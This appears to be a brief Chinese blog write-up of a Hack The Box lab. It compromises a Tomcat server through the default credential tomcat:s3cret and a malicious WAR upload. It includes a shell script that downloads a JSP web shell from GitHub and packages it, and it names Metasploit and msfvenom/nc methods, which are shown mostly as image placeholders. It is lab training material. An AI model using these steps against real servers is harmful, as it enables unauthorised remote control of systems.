easy box.

首先nmap开路:
image.png

找到8080端口:
image.png

Tomcat字典:
https://raw.githubusercontent...
找到弱口令tomcat:s3cret

部署war包:
方法1:
官方walkthrough上的:
image.png

#!/bin/sh
wget https://raw.githubusercontent.com/tennc/webshell/master/jsp/jspbrowser/Browser.jsp -O index.jsp
mkdir wshell
cp index.jsp wshell/
cd wshell
jar -cvf ../wshell.war 

部署wshell:
image.png
路径比较深
image.png
拿到flag
image.png

方法2:
msf使用multi/http/tomcat_mgr_upload
image.png
image.png
image.png
image.png

方法3:
msfvenom生成war包
image.png
上传war包后nc:
image.png


daisydydy
30 声望0 粉丝

« 上一篇
HTB - Archetype
下一篇 »
HTB-Netmon